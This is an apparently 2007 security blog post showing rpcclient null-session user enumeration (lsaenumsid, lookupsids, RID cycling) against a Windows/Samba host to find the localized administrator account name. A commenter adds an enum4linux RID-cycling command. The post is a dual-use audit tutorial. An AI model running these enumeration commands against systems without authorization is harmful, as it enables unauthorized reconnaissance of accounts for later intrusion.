Wednesday, August 29, 2007

More of using rpcclient to find usernames


So say you are given the assignment of doing an audit in a non-english speaking country. you are at a minimum going to have to locate how they spell administrator in the country in question. if google doesnt help you or gives you multiple options (like it did me this time) if you can find a box running samba or with file and printer sharing enabled and shared to the world (like you arent supposed to do) then you can use rpcclient to pull out the usernames with a null session

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient rpcclient $> lgt; lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

oh and thanks for the name of the box too :-)


fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG
CG

2 comments:

Anonymous said...

Below is a tool that uses this very technique to perform RID-Cycling against Windows / Samba systems:

http://www.portcullis-security.com/tools/free/enum4linux-0.7.0.tar.gz

The command line you'd use is something like:

$ enum4linux.pl -R 500-550,1000-1050 10.0.0.1

CG said...

excellent!
thank you anonymous good poster :-)